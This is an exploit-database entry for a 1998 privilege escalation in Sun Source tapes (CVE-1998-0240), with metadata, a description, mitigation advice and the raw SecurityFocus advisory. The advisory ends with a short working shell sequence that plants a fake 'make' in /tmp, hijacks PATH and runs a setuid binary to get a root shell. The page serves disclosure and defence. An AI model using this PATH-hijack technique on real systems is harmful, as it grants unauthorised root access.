header-logo
Suggest Exploit
vendor:
Sun Source Tapes
by:
SecurityFocus
7.2
CVSS
HIGH
Setuid Root File Vulnerability
264
CWE
Product Name: Sun Source Tapes
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE-1998-0240
CPE: o:sun:sun_source_tapes
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
1998

Setuid Root File Vulnerability

This vulnerability affects systems that have installed Sun Source tapes, as it allows users to become root by copying a shell to a temporary directory, creating a makefile that sets the permissions of the shell to 4777, setting the PATH environment variable to the temporary directory, and then executing the makeinstall or winstall binary files.

Mitigation:

The makeinstall and winstall binaries should be removed from the /usr/release/bin directory, and the PATH environment variable should be restricted to prevent users from executing programs from untrusted directories.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21/info

This applies to sites that have installed Sun Source tapes 
only.

The Sun distribution of sources (sunsrc) has an installation
procedure which creates the directory /usr/release/bin and
installs two setuid root files in it: makeinstall and winstall.
These are both binary files which exec other programs: 
"make -k install" (makeinstall) or "install" (winstall) without
a full path or reseting the PATH enviroment variable.

This makes it possible for users on that system to become root.

$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/make
$ chmod a+rx /tmp/make
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/makeinstall
$ /tmp/sh
#